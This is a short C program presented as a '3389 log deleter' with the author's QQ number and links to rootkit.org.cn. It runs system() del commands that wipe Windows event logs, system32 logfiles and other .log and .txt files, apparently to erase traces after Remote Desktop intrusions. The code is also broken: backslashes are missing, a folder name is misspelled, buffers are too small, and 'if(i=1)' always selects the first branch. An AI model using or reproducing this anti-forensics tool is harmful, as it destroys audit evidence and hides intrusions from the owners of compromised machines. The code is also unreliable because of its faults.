#include<stdio.h>
#include<string.h>
#include <stdlib.h>
void main()
{
char a[40]="del C:winntsystem32logfiles*.*";
char b[40]="del C:winntssytem32config*.evt";
char c[36]="del C:winntsystem32dtclog*.* ";
char d[36]="del C:winntsystem32*.log";
char e[36]="del C:winntsystem32*.txt";
char f[36]="del C:winnt*.txt ";
char g[36]="del C:winnt*.log";
char a1[40]="del C:windowssystem32logfiles*.*";
char b1[40]="del C:windowsssytem32config*.evt";
char c1[36]="del C:windowssystem32dtclog*.* ";
char d1[36]="del C:windowssystem32*.log";
char e1[36]="del C:windowssystem32*.txt";
char f1[36]="del C:windows*.txt ";
char g1[36]="del C:windows*.log";
int i;
printf("ttt3389日志删除器ntttttwrite by willson QQ:360928283nn");
printf("tt我的空间是:http://hi.baidu.com/willweiwein");
printf("ttthttp://www.rootkit.org.cnnnn");
printf("请输入您的操作系统名。如果是windows2000,请输入1!n如果是windows2003或xp,请输入其他任意键n请输入操作系统:");
scanf("%d",&i);
if(i=1)
{
system(a);system(b);system(c);system(d);system(e);system(f);system(g);
}
else
{
system(a1);system(b1);system(c1);system(d1);system(e1);system(f1);system(g1);
}
}